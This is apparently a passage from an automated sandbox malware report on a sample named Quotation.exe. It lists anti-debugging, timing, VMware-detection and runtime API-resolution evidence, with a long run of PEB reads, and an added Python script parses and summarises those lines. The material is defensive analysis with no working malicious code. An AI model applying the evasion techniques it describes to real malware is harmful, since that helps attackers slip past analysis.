      Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: AC9B6E second address: AC9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ECD1C0 rdtsc 3_2_33ECD1C0
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 866Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 891Jump to behavior
      Source: C:\Users\user\Desktop\Quotation.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsd350B.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\Quotation.exeAPI coverage: 1.2 %
      Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1124Thread sleep count: 51 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1124Thread sleep time: -102000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_0040687E FindFirstFileW,FindClose,0_2_0040687E
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00405C2D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C2D
      Source: explorer.exe, 00000005.00000000.2521577979.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
      Source: Quotation.exe, 00000000.00000002.2395421770.0000000003396000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
      Source: explorer.exe, 00000005.00000000.2523519321.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3262290605.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0r
      Source: explorer.exe, 00000005.00000000.2523519321.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000005.00000000.2523519321.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
      Source: explorer.exe, 00000005.00000000.2523519321.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
      Source: explorer.exe, 00000005.00000000.2520656031.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
      Source: explorer.exe, 00000005.00000000.2523519321.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
      Source: Quotation.exe, 00000003.00000003.2516094710.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2566913391.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2580408016.0000000003E3C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
      Source: explorer.exe, 00000005.00000000.2519828963.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
      Source: explorer.exe, 00000005.00000000.2520656031.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
      Source: explorer.exe, 00000005.00000000.2521577979.00000000076F8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
      Source: Quotation.exe, 00000003.00000002.2580312950.0000000003DE8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2516094710.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000003.2566913391.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000003.00000002.2580408016.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3262290605.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.2523519321.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000005.00000000.2520656031.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
      Source: explorer.exe, 00000005.00000000.2520656031.0000000003530000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
      Source: explorer.exe, 00000005.00000000.2523519321.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
      Source: explorer.exe, 00000005.00000000.2519828963.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
      Source: explorer.exe, 00000005.00000000.2523519321.0000000009B41000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000005.00000000.2521577979.000000000769A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Users\user\Desktop\Quotation.exeAPI call chain: ExitProcess graph end nodegraph_0-5170
      Source: C:\Users\user\Desktop\Quotation.exeAPI call chain: ExitProcess graph end nodegraph_0-5175
      Source: C:\Windows\SysWOW64\colorcpl.exeProcess information queried: ProcessInformation
      Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ECD1C0 rdtsc 3_2_33ECD1C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_00401C48 LdrInitializeThunk,SendMessageTimeoutW,SendMessageW,FindWindowExW,0_2_00401C48
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_73421BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73421BFF
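The evidence above (VMware device strings, the DebugPort query against colorcpl.exe, the rdtsc function, the LoadLibraryW/GetProcAddress chain) and the long run of fs:[00000030h] reads that follows are easier to act on once collapsed per function and per process. The script below is an added example written for this page; it is not part of the Joe Sandbox report and not code from the sample. It parses evidence lines in the layout shown here (table cells run together as extracted, including the residual "Jump to behavior" link text), counts PEB reads per function, and separates VM artefacts found in the sample's own memory dumps from those found only in other processes such as explorer.exe. The input is a constructed handful of lines copied from this report, and the sample name is a parameter. fs:[00000030h] is the TEB slot holding the PEB pointer on 32-bit Windows, which is why the report files these instructions under "read the PEB".

```python
import re
from collections import Counter

# Constructed sample input: eight evidence lines copied from the report as
# extracted (cells run together); the report's real list is far longer.
SAMPLE_LINES = [
    r"Source: explorer.exe, 00000005.00000000.2519828963.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000",
    r"Source: Quotation.exe, 00000003.00000002.2580312950.0000000003DE8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3262290605.0000000009B2C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW",
    r"Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPortJump to behavior",
    r"Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ECD1C0 rdtsc 3_2_33ECD1C0",
    r"Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349",
    r"Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349",
    r"Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED035C mov ecx, dword ptr fs:[00000030h]3_2_33ED035C",
    r"Source: C:\Users\user\Desktop\Quotation.exeCode function: 0_2_73421BFF GlobalAlloc,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73421BFF",
]

# Line shapes used by the report; the closing function id repeats the opening one.
MEMSTR_RE = re.compile(r"^Source: (?P<dumps>.+?\.sdmp)Binary or memory string: (?P<value>.*)$")
DUMP_RE = re.compile(r"([A-Za-z0-9_.]+\.exe), (\d{8})\.")  # "<process>, <index>.<dump>..."
CODE_RE = re.compile(r"^Source: (?P<path>.+?)Code function: (?P<fn>\d+_\d+_[0-9A-Fa-f]+) (?P<body>.+?)\s*,?(?P=fn)$")
QUERY_RE = re.compile(r"^Source: (?P<path>.+?)Process (?:information )?queried: (?P<what>\w+)(?:Jump to behavior)?$")
PEB_RE = re.compile(r"^mov (?P<reg>\w+), dword ptr fs:\[00000030h\]$")
VM_MARKERS = ("vmware", "vbox", "virtualbox", "qemu", "hyper-v", "xen")


def parse(lines):
    """Turn raw evidence lines into dicts; unrecognised shapes are kept as 'other'."""
    records = []
    for line in lines:
        line = line.strip()
        if m := MEMSTR_RE.match(line):
            procs = {name for name, _idx in DUMP_RE.findall(m["dumps"])}
            records.append({"kind": "memstr", "procs": procs, "value": m["value"]})
        elif m := CODE_RE.match(line):
            records.append({"kind": "code", "fn": m["fn"], "body": m["body"].rstrip(",")})
        elif m := QUERY_RE.match(line):
            records.append({"kind": "query", "path": m["path"], "what": m["what"]})
        else:
            records.append({"kind": "other", "raw": line})
    return records


def summarize(records, sample_name):
    """Collapse repeated entries and split VM strings by the process they were found in."""
    s = {
        "peb_reads": Counter(),         # function id -> number of fs:[30h] reads
        "peb_regs": Counter(),          # destination register of those reads
        "rdtsc_funcs": [],              # functions containing an rdtsc timing read
        "api_resolvers": [],            # functions calling LoadLibrary*/GetProcAddress
        "debug_queries": [],            # (process, ProcessInformationClass queried)
        "vm_strings_in_sample": set(),  # seen in a dump of the sample's own process
        "vm_strings_host_only": set(),  # seen only in other processes (e.g. explorer.exe)
    }
    for r in records:
        if r["kind"] == "code":
            if m := PEB_RE.match(r["body"]):
                s["peb_reads"][r["fn"]] += 1
                s["peb_regs"][m["reg"]] += 1
            elif r["body"] == "rdtsc":
                s["rdtsc_funcs"].append(r["fn"])
            elif "GetProcAddress" in r["body"] or "LoadLibrary" in r["body"]:
                s["api_resolvers"].append(r["fn"])
        elif r["kind"] == "query":
            s["debug_queries"].append((r["path"], r["what"]))
        elif r["kind"] == "memstr" and any(k in r["value"].lower() for k in VM_MARKERS):
            bucket = "vm_strings_in_sample" if sample_name in r["procs"] else "vm_strings_host_only"
            s[bucket].add(r["value"])
    return s


def report(summary):
    """Render the summary as short analyst-readable lines, busiest PEB reader first."""
    out = [f"{fn}: {n} read(s) of fs:[30h] (PEB)" for fn, n in summary["peb_reads"].most_common()]
    out += [f"{fn}: rdtsc timing check" for fn in summary["rdtsc_funcs"]]
    out += [f"{fn}: runtime API resolution (LoadLibrary/GetProcAddress)" for fn in summary["api_resolvers"]]
    out += [f"{path}: queries {what}" for path, what in summary["debug_queries"]]
    out += [f"VM artefact in sample memory: {v}" for v in sorted(summary["vm_strings_in_sample"])]
    out += [f"VM artefact only in host-process memory (verify before attributing): {v}"
            for v in sorted(summary["vm_strings_host_only"])]
    return out


if __name__ == "__main__":
    print("\n".join(report(summarize(parse(SAMPLE_LINES), "Quotation.exe"))))
```

Why the per-process split matters: the SCSI\DISK&VEN_VMWARE and NECVMWar CD-ROM strings above come from dumps of explorer.exe (process index 5), not of Quotation.exe, so on their own they show that the analysis VM is a VMware guest rather than that the sample enumerated the hardware; "Hyper-V RAW" does appear in Quotation.exe's memory but is a common Winsock provider name, so it deserves the same scepticism. On the code side, a single function with a dozen or more fs:[30h] reads (3_2_33ED2349, 3_2_33E4F172 further down) is more consistent with a loader walking PEB->Ldr to resolve APIs without imports than with one BeingDebugged check, which matches the "dynamically determine API calls" and LoadLibraryW/GetProcAddress evidence; the DebugPort query from colorcpl.exe (NtQueryInformationProcess with ProcessDebugPort) and the rdtsc function 3_2_33ECD1C0 are the better starting points for the anti-debug and anti-VM logic in a disassembler.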
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F253FC mov eax, dword ptr fs:[00000030h]3_2_33F253FC
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E603E9 mov eax, dword ptr fs:[00000030h]3_2_33E603E9
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E603E9 mov eax, dword ptr fs:[00000030h]3_2_33E603E9
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E603E9 mov eax, dword ptr fs:[00000030h]3_2_33E603E9
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E603E9 mov eax, dword ptr fs:[00000030h]3_2_33E603E9
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E603E9 mov eax, dword ptr fs:[00000030h]3_2_33E603E9
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E603E9 mov eax, dword ptr fs:[00000030h]3_2_33E603E9
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E603E9 mov eax, dword ptr fs:[00000030h]3_2_33E603E9
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E603E9 mov eax, dword ptr fs:[00000030h]3_2_33E603E9
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F0F3E6 mov eax, dword ptr fs:[00000030h]3_2_33F0F3E6
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E6E3F0 mov eax, dword ptr fs:[00000030h]3_2_33E6E3F0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E6E3F0 mov eax, dword ptr fs:[00000030h]3_2_33E6E3F0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E6E3F0 mov eax, dword ptr fs:[00000030h]3_2_33E6E3F0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E863FF mov eax, dword ptr fs:[00000030h]3_2_33E863FF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F0B3D0 mov ecx, dword ptr fs:[00000030h]3_2_33F0B3D0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5A3C0 mov eax, dword ptr fs:[00000030h]3_2_33E5A3C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5A3C0 mov eax, dword ptr fs:[00000030h]3_2_33E5A3C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5A3C0 mov eax, dword ptr fs:[00000030h]3_2_33E5A3C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5A3C0 mov eax, dword ptr fs:[00000030h]3_2_33E5A3C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5A3C0 mov eax, dword ptr fs:[00000030h]3_2_33E5A3C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5A3C0 mov eax, dword ptr fs:[00000030h]3_2_33E5A3C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E583C0 mov eax, dword ptr fs:[00000030h]3_2_33E583C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E583C0 mov eax, dword ptr fs:[00000030h]3_2_33E583C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E583C0 mov eax, dword ptr fs:[00000030h]3_2_33E583C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E583C0 mov eax, dword ptr fs:[00000030h]3_2_33E583C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED63C0 mov eax, dword ptr fs:[00000030h]3_2_33ED63C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F0C3CD mov eax, dword ptr fs:[00000030h]3_2_33F0C3CD
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E733A5 mov eax, dword ptr fs:[00000030h]3_2_33E733A5
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E833A0 mov eax, dword ptr fs:[00000030h]3_2_33E833A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E833A0 mov eax, dword ptr fs:[00000030h]3_2_33E833A0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7438F mov eax, dword ptr fs:[00000030h]3_2_33E7438F
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7438F mov eax, dword ptr fs:[00000030h]3_2_33E7438F
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4E388 mov eax, dword ptr fs:[00000030h]3_2_33E4E388
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4E388 mov eax, dword ptr fs:[00000030h]3_2_33E4E388
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4E388 mov eax, dword ptr fs:[00000030h]3_2_33E4E388
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F2539D mov eax, dword ptr fs:[00000030h]3_2_33F2539D
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EA739A mov eax, dword ptr fs:[00000030h]3_2_33EA739A
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EA739A mov eax, dword ptr fs:[00000030h]3_2_33EA739A
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E48397 mov eax, dword ptr fs:[00000030h]3_2_33E48397
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E48397 mov eax, dword ptr fs:[00000030h]3_2_33E48397
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E48397 mov eax, dword ptr fs:[00000030h]3_2_33E48397
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33EF437C mov eax, dword ptr fs:[00000030h]3_2_33EF437C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E57370 mov eax, dword ptr fs:[00000030h]3_2_33E57370
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E57370 mov eax, dword ptr fs:[00000030h]3_2_33E57370
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E57370 mov eax, dword ptr fs:[00000030h]3_2_33E57370
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F0F367 mov eax, dword ptr fs:[00000030h]3_2_33F0F367
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1A352 mov eax, dword ptr fs:[00000030h]3_2_33F1A352
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED2349 mov eax, dword ptr fs:[00000030h]3_2_33ED2349
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4D34C mov eax, dword ptr fs:[00000030h]3_2_33E4D34C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4D34C mov eax, dword ptr fs:[00000030h]3_2_33E4D34C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED035C mov eax, dword ptr fs:[00000030h]3_2_33ED035C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED035C mov eax, dword ptr fs:[00000030h]3_2_33ED035C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED035C mov eax, dword ptr fs:[00000030h]3_2_33ED035C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED035C mov ecx, dword ptr fs:[00000030h]3_2_33ED035C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED035C mov eax, dword ptr fs:[00000030h]3_2_33ED035C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED035C mov eax, dword ptr fs:[00000030h]3_2_33ED035C
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F25341 mov eax, dword ptr fs:[00000030h]3_2_33F25341
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E49353 mov eax, dword ptr fs:[00000030h]3_2_33E49353
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E49353 mov eax, dword ptr fs:[00000030h]3_2_33E49353
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7F32A mov eax, dword ptr fs:[00000030h]3_2_33E7F32A
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E47330 mov eax, dword ptr fs:[00000030h]3_2_33E47330
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1132D mov eax, dword ptr fs:[00000030h]3_2_33F1132D
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F1132D mov eax, dword ptr fs:[00000030h]3_2_33F1132D
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8A30B mov eax, dword ptr fs:[00000030h]3_2_33E8A30B
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8A30B mov eax, dword ptr fs:[00000030h]3_2_33E8A30B
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E8A30B mov eax, dword ptr fs:[00000030h]3_2_33E8A30B
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED930B mov eax, dword ptr fs:[00000030h]3_2_33ED930B
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED930B mov eax, dword ptr fs:[00000030h]3_2_33ED930B
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33ED930B mov eax, dword ptr fs:[00000030h]3_2_33ED930B
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E4C310 mov ecx, dword ptr fs:[00000030h]3_2_33E4C310
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E70310 mov ecx, dword ptr fs:[00000030h]3_2_33E70310
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E602E1 mov eax, dword ptr fs:[00000030h]3_2_33E602E1
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E602E1 mov eax, dword ptr fs:[00000030h]3_2_33E602E1
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E602E1 mov eax, dword ptr fs:[00000030h]3_2_33E602E1
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F0F2F8 mov eax, dword ptr fs:[00000030h]3_2_33F0F2F8
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F252E2 mov eax, dword ptr fs:[00000030h]3_2_33F252E2
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E492FF mov eax, dword ptr fs:[00000030h]3_2_33E492FF
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED mov eax, dword ptr fs:[00000030h]3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED mov eax, dword ptr fs:[00000030h]3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED mov eax, dword ptr fs:[00000030h]3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED mov eax, dword ptr fs:[00000030h]3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED mov eax, dword ptr fs:[00000030h]3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED mov eax, dword ptr fs:[00000030h]3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED mov eax, dword ptr fs:[00000030h]3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED mov eax, dword ptr fs:[00000030h]3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED mov eax, dword ptr fs:[00000030h]3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED mov eax, dword ptr fs:[00000030h]3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED mov eax, dword ptr fs:[00000030h]3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED mov eax, dword ptr fs:[00000030h]3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED mov eax, dword ptr fs:[00000030h]3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33F012ED mov eax, dword ptr fs:[00000030h]3_2_33F012ED
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E592C5 mov eax, dword ptr fs:[00000030h]3_2_33E592C5
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E592C5 mov eax, dword ptr fs:[00000030h]3_2_33E592C5
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5A2C3 mov eax, dword ptr fs:[00000030h]3_2_33E5A2C3
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5A2C3 mov eax, dword ptr fs:[00000030h]3_2_33E5A2C3
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5A2C3 mov eax, dword ptr fs:[00000030h]3_2_33E5A2C3
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5A2C3 mov eax, dword ptr fs:[00000030h]3_2_33E5A2C3
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E5A2C3 mov eax, dword ptr fs:[00000030h]3_2_33E5A2C3
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7B2C0 mov eax, dword ptr fs:[00000030h]3_2_33E7B2C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7B2C0 mov eax, dword ptr fs:[00000030h]3_2_33E7B2C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7B2C0 mov eax, dword ptr fs:[00000030h]3_2_33E7B2C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7B2C0 mov eax, dword ptr fs:[00000030h]3_2_33E7B2C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7B2C0 mov eax, dword ptr fs:[00000030h]3_2_33E7B2C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7B2C0 mov eax, dword ptr fs:[00000030h]3_2_33E7B2C0
      Source: C:\Users\user\Desktop\Quotation.exeCode function: 3_2_33E7B2C0 mov eax, dword ptr fs:[00000030h]3_2_33E7B2C0
